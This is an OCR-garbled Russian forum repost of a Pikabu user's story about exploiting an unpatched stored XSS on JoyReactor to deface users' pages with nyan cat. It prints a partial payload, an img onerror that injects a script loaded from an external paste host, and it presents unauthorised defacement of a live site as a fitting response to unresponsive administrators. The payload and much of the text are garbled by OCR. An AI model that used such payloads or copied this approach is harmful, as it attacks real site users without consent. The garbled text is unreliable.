А тем временем, пикабушники продолжают выебываться.
Подробнее
^ , Привет, Пикабу! ^ , Вчера я опубликовал "супер-мега" историю о взломе популярной браузерной игры С&С. Но, пост не сыскал популярность, а все из-за того, что текст был написал слишком техническим языком, что как я понял, не есть хорошо. Поэтому, эту историю про взлом ^уКеасюг, я постарался изложить как можно проще. Надеюсь, у меня это получилось. Jo/Rêâccor Чтобы было меньше вопросов: 1) Уязвимость - это такая штука, через которую можно сделать плохо кому-либо. Они бывают серверные и клиентские. Клиентские - это когда я делаю плохо ОДНОМУ, конкретному пользователю, на которого провожу атаку. Серверные уязвимости - это такие шняги, которые затрагивают всех и вся. 2) В случае JoyReactor уязвимость серверная - активная XSS. Это такая штука, которая позволяет выполнять JavaScript код на страницах сайта за пользователя. Кароч, если пользователь зашел на вредоносную страницу с XSS уязвимостью, то я могу, например, удалить его аккаунт или все фоточки, написать комментарий от его имени и все такое. В общем, а теперь сам экшен. Вон такая страница будет у пользователей JoyReactora: Пикабу лучше JoyReactor! АХАХХАХАХАХАХАХ Там еще музыка из nyan cat играет. л_л Вот так. Эту уязвимость я нашел еще 20 числа сего месяца, запостил к себе в twitter. Потом пытался найти email ящик, куда сообщить об оплошности, но не нашел... А как надо бороться с неотзывчивой администрацией?! Правильно! Надо постить nyan cat на всю страницу и добавить музыки :) Ну, а теперь, когда я рассказал, как все будет, давайте займемся делом! Сейчас на часах 1:10. 1. Заходим на JoyReactor.сс, и создаем новый пост с картинкой, у которой длина будет 830рх или больше. Нужно нам это, для того, чтобы занять всю ту белую область в ленте: 1 Комиксы )[ .иф.и )( красивые ««ртянкнЦ 9««К )[ «id«' )( »пт» )( Эроти.а )( «от» К «югу Ц шры ) Теги; Привет от пикабу. песочница. Это волшебная картинка. Просто наведи на нее курсор. Картинка: Выберите файл joyxss.png из URL Ifí ОПРОС редактор А теперь маленькое отступление. Прошло уже пол часа с 1:10, а написан всего один абзац и маленькая картинка. Знаете почему? Уязвимость то работает - то нет. Я не шучу... В общем, здесь у меня будет картинка - "Joy, не надо так." Mission Complete. Спустя двух бургеров, одной серии "Теории большого взрыва", я все таки со всем разобрался. Я все еще не понял как, но мать его, уязвимость работает. Я надеюсь, пост "в прямом эфире" не сильно вас раздражает, я пока только экспериментирую со стилем написания и отбиваю руку. :) А теперь, давайте пропустим, всю эту техническую чепуху, над которой я так долго парился, и сразу добавим вредоносный код на страницу JoyReactor. "><img src=x onerror="document.wnte('<scnpt src=https://paste.!ugons.org/raw/GpDXuQTVsuLhvjlY24i сохранить В целях безопасности, вектор атаки немного изменен, так как уязвимость еще не закрыта, а лига школьников не дремлет. P.S. Я надеюсь вам понравился мой пост, я очень старался. Я не стал предавать истории излишней глянцевости, как в голливудских фильмах про хакеров, где крутятся какие-то 3D кубики и пароли брутятся за 30 секунд. :) Надеюсь не зря. А мораль истории такова - Уважаемая администрация ресурсов, Вы имеете дело с огромной аудиторией -будьте отзывчивы и более кропотливо относитесь к безопасности своего детяща. Аминь. longpost.skv-dev.com
joyreactor,Пикабу,иди выёбывайся в свой двор,минусуйте,вообще похер,песочница
Еще на тему
Но фраза "то работает, то не работает" - вообще пушка! XD